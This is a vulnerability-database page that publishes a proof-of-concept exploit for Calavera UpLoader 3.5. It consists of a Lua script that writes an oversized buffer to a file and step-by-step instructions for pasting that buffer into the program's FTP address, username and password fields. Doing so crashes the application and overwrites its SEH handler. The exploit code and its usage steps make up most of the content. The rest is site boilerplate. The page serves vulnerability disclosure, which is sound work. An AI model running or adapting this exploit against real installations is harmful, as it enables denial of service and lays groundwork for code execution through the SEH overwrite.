Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)

2021.01.04
br uromulou (BR) br
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

-- Title : Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite). -- Courtesy of Rômulo, @uromulou - Date : 04/01/2021. -- PoC < Proof of Concept: -- -- 1 -> Run the lua script, to create file "poc.dat"... -- 2 -> Copy the content of the new file "poc.dat" to clipboard... -- 3 -> Open the application... -- 4 -> Click on "Settings"... -- 5 -> Paste contents of the generated file into the parameters "FTP Address", "Username and Password". Furthermore, check the box with the statement "Check to save password in preferences"... -- 6 -> Down... -- print("-> Calavera UpLoader 3.5 - 'FTP Logi' Denial of Service (PoC + SEH Overwrite)") print("-> This exploit was written by Rômulo, @uromulou.") local buffer = string.rep("A", 477) .. "BBBB" .. "CCCC" .. string.rep("\xff", 2000) file = io.open("poc.dat", "w") file:write(buffer) file:close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top